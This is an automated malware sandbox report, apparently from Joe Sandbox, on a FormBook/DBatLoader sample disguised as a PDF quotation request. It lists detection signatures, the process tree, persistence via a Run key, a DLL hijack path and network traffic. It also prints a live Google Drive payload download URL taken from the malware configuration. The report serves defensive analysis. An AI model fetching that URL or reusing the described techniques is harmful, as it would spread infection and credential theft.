Windows Analysis Report
RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe

Overview

General Information

Sample name: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
Analysis ID: 1580362
MD5: aaca1b72e0ac5dc118b0f981667e8179
SHA1: 162a85d0d2d6eec0fb05d043167bbd8451183735
SHA256: 8a63bbd795519e52538e95891f205d78a4ccc474c24e80d8efab364ad4ca2335
Tags: exe, scr, user-abuse_ch

Detection

DBatLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe (PID: 7920 cmdline: "C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe" MD5: AACA1B72E0AC5DC118B0F981667E8179)
    • cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • kmtqwssC.pif (PID: 7228 cmdline: C:\Users\Public\Libraries\kmtqwssC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Csswqtmk.PIF (PID: 6636 cmdline: "C:\Users\Public\Libraries\Csswqtmk.PIF" MD5: AACA1B72E0AC5DC118B0F981667E8179)
    • cmd.exe (PID: 7104 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • kmtqwssC.pif (PID: 7584 cmdline: C:\Users\Public\Libraries\kmtqwssC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Csswqtmk.PIF (PID: 6624 cmdline: "C:\Users\Public\Libraries\Csswqtmk.PIF" MD5: AACA1B72E0AC5DC118B0F981667E8179)
    • cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • kmtqwssC.pif (PID: 2260 cmdline: C:\Users\Public\Libraries\kmtqwssC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
{"Download Url": ["https://drive.google.com/uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6"]}
Source | Rule | Description | Author | Strings
00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1454887836.000000007FB80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
12.2.kmtqwssC.pif.400000.3.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
16.2.kmtqwssC.pif.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
6.2.kmtqwssC.pif.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
12.2.kmtqwssC.pif.400000.3.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
16.2.kmtqwssC.pif.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessId: 7920, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\kmtqwssC.pif, CommandLine: C:\Users\Public\Libraries\kmtqwssC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\kmtqwssC.pif, NewProcessName: C:\Users\Public\Libraries\kmtqwssC.pif, OriginalFileName: C:\Users\Public\Libraries\kmtqwssC.pif, ParentCommandLine: "C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ParentProcessId: 7920, ParentProcessName: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\kmtqwssC.pif, ProcessId: 7228, ProcessName: kmtqwssC.pif
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessId: 7920, TargetFilename: C:\Windows \SysWOW64\svchost.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Csswqtmk.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessId: 7920, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Csswqtmk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Csswqtmk.PIF" , ParentImage: C:\Users\Public\Libraries\Csswqtmk.PIF, ParentProcessId: 6636, ParentProcessName: Csswqtmk.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 7104, ProcessName: cmd.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Csswqtmk.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessId: 7920, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Csswqtmk
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\kmtqwssC.pif, CommandLine: C:\Users\Public\Libraries\kmtqwssC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\kmtqwssC.pif, NewProcessName: C:\Users\Public\Libraries\kmtqwssC.pif, OriginalFileName: C:\Users\Public\Libraries\kmtqwssC.pif, ParentCommandLine: "C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ParentProcessId: 7920, ParentProcessName: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\kmtqwssC.pif, ProcessId: 7228, ProcessName: kmtqwssC.pif
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T11:28:42.529127+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49705 | 172.217.19.238 | 443 | TCP
2024-12-24T11:28:45.321881+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49707 | 142.250.181.1 | 443 | TCP

AV Detection

Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6"]}
Source: C:\Users\Public\Libraries\Csswqtmk.PIF | ReversingLabs: Detection: 65%
Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | ReversingLabs: Detection: 65%
Source: Yara match | File source: 12.2.kmtqwssC.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.kmtqwssC.pif.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1977379900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Public\Libraries\Csswqtmk.PIF | Joe Sandbox ML: detected
Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Joe Sandbox ML: detected
Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.11:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.11:49707 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020790000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.00000000206E9000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: kmtqwssC.pif, 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 00000006.00000003.1652551024.000000002CBF5000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000006.00000003.1642276952.000000002CA44000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000006.00000002.1881572737.000000002CF3E000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000002.2016525244.00000000237AE000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000002.2016525244.0000000023610000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1878066252.000000002345C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1873802180.00000000232AB000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1972186536.000000002FD41000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000002FEF0000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1967570535.000000002FB9C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000003008E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: kmtqwssC.pif, kmtqwssC.pif, 0000000C.00000002.2016525244.00000000237AE000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000002.2016525244.0000000023610000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1878066252.000000002345C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1873802180.00000000232AB000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1972186536.000000002FD41000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000002FEF0000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1967570535.000000002FB9C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000003008E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020790000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1395408495.00000000216A1000.00000004.00000020.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1395408495.0000000021672000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000003.1538761770.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.00000000206E9000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000003.1538761770.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626132565.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626132565.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_029558B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,1_2_029558B4

Networking

Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6
Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_0296E2F8 InternetCheckConnectionA,1_2_0296E2F8
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49707 -> 142.250.181.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49705 -> 172.217.19.238:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6 HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: drive.google.com
Source: global traffic | HTTP traffic detected: GET /download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=download HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: drive.usercontent.google.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
